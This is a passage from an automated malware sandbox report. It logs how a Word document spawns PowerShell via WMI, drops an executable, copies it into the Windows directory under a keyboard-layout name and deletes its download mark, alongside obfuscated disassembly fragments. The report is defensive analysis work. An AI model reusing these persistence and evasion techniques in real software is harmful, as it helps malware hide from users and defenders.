Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00287A8E push ecx; mov dword ptr [esp], 000066B1h 4_2_00287A8F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00287AEE push ecx; mov dword ptr [esp], 00000282h 4_2_00287AEF
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00287B2E push ecx; mov dword ptr [esp], 0000765Fh 4_2_00287B2F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0028DE1B push ecx; retf 4_2_0028DE30
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0028D6DB push ecx; retf 4_2_0028D6F0
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002877DE push ecx; mov dword ptr [esp], 00004180h 4_2_002877DF
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E5E10 push ecx; mov dword ptr [esp], 0000AF8Ah 5_2_003E5E11
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E5D50 push ecx; mov dword ptr [esp], 000097F2h 5_2_003E5D51
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E5F50 push ecx; mov dword ptr [esp], 00000282h 5_2_003E5F51
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E5E40 push ecx; mov dword ptr [esp], 00002B63h 5_2_003E5E41
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe Code function: 5_2_003E5C40 push ecx; mov dword ptr [esp], 00004180h 5_2_003E5C41

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Executable created and started: C:\Windows\SysWOW64\spopk\KBDFA.exe Jump to behavior
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe PE file moved: C:\Windows\SysWOW64\spopk\KBDFA.exe Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe File opened: C:\Windows\SysWOW64\spopk\KBDFA.exe:Zone.Identifier read attributes | delete Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00402AE1 IsIconic,GetWindowPlacement,GetWindowRect, 4_2_00402AE1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Off